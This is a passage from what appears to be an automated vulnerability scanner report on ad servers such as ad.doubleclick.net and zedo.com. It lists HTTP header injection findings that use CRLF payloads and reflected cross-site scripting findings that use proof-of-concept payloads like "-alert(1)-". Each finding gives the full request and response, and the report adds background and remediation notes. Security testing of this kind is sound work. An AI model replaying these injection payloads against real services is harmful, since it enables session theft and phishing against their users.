Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/678b5
8384566a10f
/tmg.telegraph.sponsored/sponsored.travel;at=header;pos=1;sc=sponsored-travel;pt=story;pg=8509794;lvl=3;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305509216094:
Date: Mon, 16 May 2011 01:35:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/tmg.telegraph.sponsored/sponsored.travel.disney

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6df0f%0d%0a9d7229a8f0d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6df0f%0d%0a9d7229a8f0d/tmg.telegraph.sponsored/sponsored.travel.disney;at=header;pos=1;sc=sponsored-travel-disney;pt=story;pg=8509938;lvl=4;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305508777021? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6df0f
9d7229a8f0d
/tmg.telegraph.sponsored/sponsored.travel.disney;at=header;pos=1;sc=sponsored-travel-disney;pt=story;pg=8509938;lvl=4;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305508777021:
Date: Mon, 16 May 2011 01:21:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 237ec%0d%0a880ab23038f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /237ec%0d%0a880ab23038f/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/237ec
880ab23038f
/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http: //ads.bluelithium.com/clk
Date: Mon, 16 May 2011 01:34:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.4. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4975.1207.TRAVELOCITY.COM/B5393428.18

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8fa4b%0d%0a608cfb9867d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8fa4b%0d%0a608cfb9867d/N4975.1207.TRAVELOCITY.COM/B5393428.18;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d122243%26AdID%3d164325%26TargetID%3d8852%26Segments%3d1,9,3090,4300,4303,5796,5907,9520,10495,11148,12670,13331,18268,20052,20168,20299,20311,21094,21281%26Targets%3d8427,8852,28340,30167,30402,30431,31703,31958,8948%26Values%3d25,30,51,60,72,80,92,101,110,152,194,215,234,261,293,2176,2218,2285,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2468,2537,4760,4772,6472,6474,6974,8257,8512,8829,9120,9844,9845,9846,12194,12196%26Redirect%3d;ord=nkufyk,bgKaRRRrgqcz? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=cruise&paxa=0&paxs=0&paxc=0&adloc=NA&random=813059&tile=534041638164681
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8fa4b
608cfb9867d
/N4975.1207.TRAVELOCITY.COM/B5393428.18;sz=160x600;click=http: //dm.travelocity.com/event.ng/Type=click&FlightID=122243&AdID=164325&TargetID=8852&Segments=1,9,3090,4300,4303,5796,5907,9520,10495,11148,12670,13331,18268,20052,20168,20299,20311,21094,21281&Targets=8427,8852,28340,301
Date: Mon, 16 May 2011 01:30:30 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.5. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.DbclkAdEx/B5478635.45

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2e63e%0d%0a47716407f97 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2e63e%0d%0a47716407f97/N5823.DbclkAdEx/B5478635.45;sz=728x90;ord=7992084605561387239;AD_ID=26005388;BEHAVIOR_SIGNAL_ID=319697420;CHANNEL_ID=11185948;LINE_ITEM_ID=184588126;PUBLISHER_ID=11185880;SITE_ID=13906109?;click=http://r.turn.com/r/tpclick/id/57ha2ZqW6W5ZugEAbQABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9942530385485090&output=html&h=90&slotname=7409232867&w=728&lmt=1305527557&flash=10.3.181&url=http%3A%2F%2Fsecureshopping.mcafee.com%2F&dt=1305509556443&bpp=3&shv=r20110509&jsv=r20110506&correlator=1305509557695&frm=0&adk=2067801485&ga_vid=934359654.1305509558&ga_sid=1305509558&ga_hid=579067022&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=1&dtd=1275&xpc=N75PYouOId&p=http%3A//secureshopping.mcafee.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2e63e
47716407f97
/N5823.DbclkAdEx/B5478635.45;sz=728x90;ord=7992084605561387239;AD_ID=26005388;BEHAVIOR_SIGNAL_ID=319697420;CHANNEL_ID=11185948;LINE_ITEM_ID=184588126;PUBLISHER_ID=11185880;SITE_ID=13906109:
Date: Mon, 16 May 2011 01:42:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.6. http://ad.doubleclick.net/adi/x1.dt/dt [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.dt/dt

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 84877%0d%0ac4dfd0f2329 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /84877%0d%0ac4dfd0f2329/x1.dt/dt;sz=1x1;ord=1289783? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=;u=17918465;ord=6394684?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/84877
c4dfd0f2329
/x1.dt/dt;sz=1x1;ord=1289783:
Date: Mon, 16 May 2011 01:25:42 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.7. http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5155.272756.AOL-ADVERTISING/B5116932

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 13a44%0d%0ad08cd4fa359 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /13a44%0d%0ad08cd4fa359/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000786652/mnum=0001007584/cstr=71920917=_4dd07bc9,3027560310,786652%5E1007584%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=71920917/optn=64?trg=;ord=3027560310? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/13a44
d08cd4fa359
/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http: //r1-ads.ace.advertising.com/click/site=0000786652/mnum=0001007584/cstr=71920917=_4dd07bc9,3027560310,786652^1007584^1183^0,1_/xsxdata=$xsxdata/bnum=71920917/optn=64
Date: Mon, 16 May 2011 01:26:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.8. http://ad.doubleclick.net/adj/pmv.telegraph.tg/sponsored [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pmv.telegraph.tg/sponsored

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 858b0%0d%0a7d93e849469 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /858b0%0d%0a7d93e849469/pmv.telegraph.tg/sponsored;cat=sponsored/travel.disney;tile=1;sz=468x60,728x90;dcopt=ist;ord=1305508777021? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/858b0
7d93e849469
/pmv.telegraph.tg/sponsored;cat=sponsored/travel.disney;tile=1;sz=468x60,728x90;dcopt=ist;ord=1305508777021:
Date: Mon, 16 May 2011 01:21:36 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.9. http://c7.zedo.com/utils/ecSet.js [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 745cd%0d%0aa239816aaf was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=745cd%0d%0aa239816aaf&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; FFgeo=2241452; FFChanCap=1595B496,121#543485#876543#675101#543481#675099|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1; FFSkp=305,3603,15,1:; FFcat=305,3603,15:496,121,14:496,121,7:496,121,9; FFad=0:15:1:5; FFCap=1595B305,212785|0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 745cd
a239816aaf
;expires=Wed, 15 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "637af42d-1f5-47f291fef3640"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6911
Date: Mon, 16 May 2011 01:30:24 GMT
Connection: close



5. Cross-site scripting (reflected)  previous  next
There are 126 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [campID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89ce2"-alert(1)-"bc963da0405 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=8821889ce2"-alert(1)-"bc963da0405&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8441
Date: Mon, 16 May 2011 01:28:23 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
lMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=8821889ce2"-alert(1)-"bc963da0405&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmo
...[SNIP]...

5.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [crID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad20f"-alert(1)-"672c7ef153f was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371ad20f"-alert(1)-"672c7ef153f&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8441
Date: Mon, 16 May 2011 01:29:21 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371ad20f"-alert(1)-"672c7ef153f&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.htm
...[SNIP]...

5.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [partnerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5009"-alert(1)-"6877c3dfa7c was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

